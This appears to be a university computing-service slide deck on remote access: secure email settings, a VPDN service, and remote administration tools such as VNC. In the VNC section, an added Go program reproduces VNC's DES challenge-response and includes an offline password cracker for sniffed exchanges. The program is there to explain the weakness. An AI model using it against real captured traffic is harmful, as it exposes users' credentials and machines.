Remote Access To Cambridge Resources: A Current Digest of Possible Ways To Deal With A Variety of Requirements


Remote Access to Cambridge Resources
A current digest of possible ways to deal with a variety of requirements.
Remote Access to Resources in Cambridge
• Increasingly both students and staff of the
University want (and often expect) resources to be
available to them wherever they are.
• For security and licensing purposes such access
can be difficult for most users to “get their heads
round”, and a seamless solution is not always
possible.
• The range and variety of such resources often
means that a variety of solutions is required.
What type of access?
• One of the most frequently asked questions is “I'm
away from Cambridge and now although I can
read my email, I can't seem to send it”.
• The answer used to be “Use webmail”.
Unfortunately most users think that any solution
which means that they can't use the software they
are used to (which might of course be webmail) is
a poor second best and leads to answers of the
“Yes but” type.
Email Access
• The mail group have now developed a secure
solution for this problem which works with most
of the common varieties of MUA (mail clients)
including Outlook, Mulberry, Outlook Express,
Pine, Opera, PC-Pine, Entourage and Apple Mail
amongst others.
• Details of how to configure these can be found at
http://www.cam.ac.uk/cs/email/muasettings.html
• Earlier versions of Outlook Express (any version
up to and including 5) will not work with Hermes
in this way.
Email Access
• The current version of Mulberry (3.1.6) is now
configured to work with SSL.
• Unfortunately most email clients are not
configured to work this way “out of the box”,
although the Computing Service would obviously
prefer everybody to use this type of access for
security reasons.
• The most important check to make if you or your
users work in several different locations (inside or
outside Cambridge) is that they are not using
POP. The problem is fairly obvious: a POP client normally
downloads messages and deletes them from the server, so mail
read from one location is no longer there when the same user
looks from another (IMAP leaves the mailbox on the server).
General Access from outside Cam
• The (trial) VPDN service does make a wide variety
of resources available, but not all.
• Clients are available for Windows
(98/ME/NT/2000/XP/2003), MacOS X and Linux.
• Earlier problems with ICS-style (Windows Internet
Connection Sharing) and other router/NAT setups are now curable.
• You will still need the Cisco client for Windows
2000 (unless you really enjoy hacking Windows
2000), and you are advised to use SP2 for XP (NAT
traversal problems).
General Access from outside Cam
• Leaflets on general configuration can be
found at:
http://www.cam.ac.uk/cs/docs/remote.html
• General information and FAQs can be
found at: http://www.cam.ac.uk/cs/netdiv/vpdn.html
General Access from outside Cam
• The VPDN makes some electronic resources available
(the details of which can be found on the University
Library web server).
• It makes the Cambridge news server (including posting)
available.
• Some users feel that it is a ‘magpie replacement’. Not
really true, but it serves a similar purpose.
• It is not necessarily very useful in another corporate
environment (or where a user needs to see both sides of a
Windows network) and should only be used when
necessary.
RATs (Remote Administration Tools)
• A RAT is defined by PestPatrol as “a Trojan
that, when run, provides an attacker
with the capability of remotely
controlling a machine via a ‘client’ in
the attacker's machine, and a ‘server’
in the victim's machine”.
• Unfortunately this is also what most
users now want to use to get access to
their desktop or home machine when
they are not physically present.
RATs (Remote Administration Tools)
• Anybody wanting to use a RAT in this way
should make sure that they are not using a
RAT which sends passwords “in clear” ie
so that they can be “snooped” over the
Internet.
• It is also important to ensure (even with
encrypted access) that strong passwords (or
alternate mechanisms) are used.
RATs (Remote Administration Tools)
• It is possible that some border routers may
block access to certain well-known ports
used by RATs.
• For example at least one English university
will not permit incoming 6129 calls (the
default Dameware port).
• Dameware is a favoured hacker RAT,
although of course it has legitimate uses.
RATs (Remote Administration Tools)
• Common examples of such utilities include
Microsoft’s Remote Desktop (previously known
as the Terminal Services client) in both PC and
Mac OS X versions.
• The “industry-standard” version used to be
pcAnywhere, now owned by Symantec.
• One which was developed in Cambridge, at AT&T
Laboratories Cambridge (originally the Olivetti Research
Laboratory), is VNC (Virtual Network Computing).
RATs (Remote Administration Tools)
• VNC’s commercial successors can be found at:
http://www.realvnc.com
• Other versions include TightVNC (
http://www.tightvnc.com) and at least another ten
ongoing projects available (search for VNC) at
http://www.sourceforge.org
• These are normally available for Windows, Mac OS X
and Linux.
• Apple of course also have their own version of
Remote Desktop
VNC Security Considerations
• Currently PC-Support deprecates most of the free versions
of VNC “out of the box”, since they normally send passwords
(and subsequent traffic) “in clear”, disastrously.
• Even TightVNC, which does not send the password itself,
relies on the classic VNC challenge-response (DES)
authentication, which only ever looks at the first eight
characters of the password, and the screen, keyboard and
clipboard traffic that follows the login is still sent
unencrypted. As their FAQ page says, this is not enough…
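The two weaknesses above (eight-character truncation, and a challenge/response that anyone on the path can capture) are easiest to see by reproducing the classic “VNC Authentication” handshake. The following is an added example written for this page, not code from the original deck or from any VNC project. It assumes the RFB 3.3 scheme as implemented by the original VNC and its descendants: the server sends a 16-byte challenge, the client replies with the challenge encrypted as two DES-ECB blocks under a key made from the password zero-padded or truncated to 8 bytes with each byte bit-reversed. The challenge value and the candidate wordlist are constructed for the demonstration.

```go
package main

import (
	"bytes"
	"crypto/des"
	"errors"
	"fmt"
)

// vncKey turns a password into the 8-byte DES key used by classic
// "VNC Authentication" (RFB security type 2). The password is copied into
// an 8-byte buffer, so characters beyond the eighth are silently dropped
// and shorter passwords are zero-padded. Each key byte is then bit-reversed,
// a quirk of the original VNC DES implementation that compatible clients
// and servers reproduce.
func vncKey(password string) []byte {
	key := make([]byte, 8)
	copy(key, password) // copies at most 8 bytes: this is the truncation
	for i, b := range key {
		var r byte
		for j := 0; j < 8; j++ {
			r = r<<1 | (b>>uint(j))&1
		}
		key[i] = r
	}
	return key
}

// vncResponse answers a 16-byte server challenge the way a VNC client does:
// two independent DES-ECB blocks under the derived key. Both the challenge
// and this response travel on the wire unencrypted.
func vncResponse(password string, challenge []byte) ([]byte, error) {
	if len(challenge) != 16 {
		return nil, errors.New("VNC challenge must be 16 bytes")
	}
	block, err := des.NewCipher(vncKey(password))
	if err != nil {
		return nil, err
	}
	resp := make([]byte, 16)
	block.Encrypt(resp[:8], challenge[:8])
	block.Encrypt(resp[8:], challenge[8:])
	return resp, nil
}

// crackVNC is what an eavesdropper does with a captured challenge/response
// pair: try candidate passwords offline until one reproduces the response.
// Only the first 8 characters of each candidate matter, which is why the
// effective search space is so small. Returns the first matching candidate.
func crackVNC(challenge, response []byte, candidates []string) (string, bool) {
	for _, c := range candidates {
		r, err := vncResponse(c, challenge)
		if err == nil && bytes.Equal(r, response) {
			return c, true
		}
	}
	return "", false
}

func main() {
	// Constructed challenge; a real server sends 16 random bytes.
	challenge := []byte("0123456789abcdef")

	// The user believes the password is 13 characters long...
	long, _ := vncResponse("Tr0ub4dor&3xx", challenge)
	// ...but the server only ever checked the first eight.
	short, _ := vncResponse("Tr0ub4do", challenge)
	fmt.Printf("13-char and 8-char passwords give the same response: %v\n",
		bytes.Equal(long, short))

	// Constructed wordlist; no further contact with the server is needed
	// once the challenge and response have been sniffed.
	pw, ok := crackVNC(challenge, long, []string{"password", "letmein", "Tr0ub4do"})
	fmt.Printf("recovered password: %q (found=%v)\n", pw, ok)
}
```

The point for practitioners is that the strength of a VNC password beyond its eighth character is zero, and that the challenge/response pair is recorded by anyone who can see the connection, so the guessing happens offline at whatever speed the attacker's hardware allows. Tunnelling the VNC session inside SSH or the VPDN hides both values from the network.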
RAT Security in General
• I use Remote Desktop from home to access
my machine at work, but I also use the
VPDN so my traffic is doubly protected,
once by RDP, once by the VPDN tunnel.
• Even so a strong password (now defined in
the Windows world as 14 characters or
more of mixed alphanumeric/punctuation
type) is necessary.
RAT Security in general
• If you want to use “clear-text” protocols, think
about tunnelling or port-forwarding them through an
encrypted connection: for example, forward a local port
to the remote machine's VNC port over SSH (PuTTY's
Tunnels panel can do this) and point the viewer at the
local port, so nothing crosses the Internet in clear.
• Cambridge-only addresses can be accessed from
outside cam.ac.uk using the VPDN.
• If you have older users who are dedicated to
telnet, introduce them to PuTTY (with a default SSH
setting) and WinSCP for file transfer.
• Remember that even encryption will not stop a brute-
force attack if the system has weak passwords.
Other Solutions
• There are a lot of other solutions (including
software like Exceed, VLANs, dedicated VPNs
between one machine and another) which cannot
be gone into in detail here but should be
considered, especially if a group of users is
involved.
• There are also dedicated hardware/network
solutions for such needs.
• Advice in this area can be sought from the
help-desk, who will direct it to the relevant group.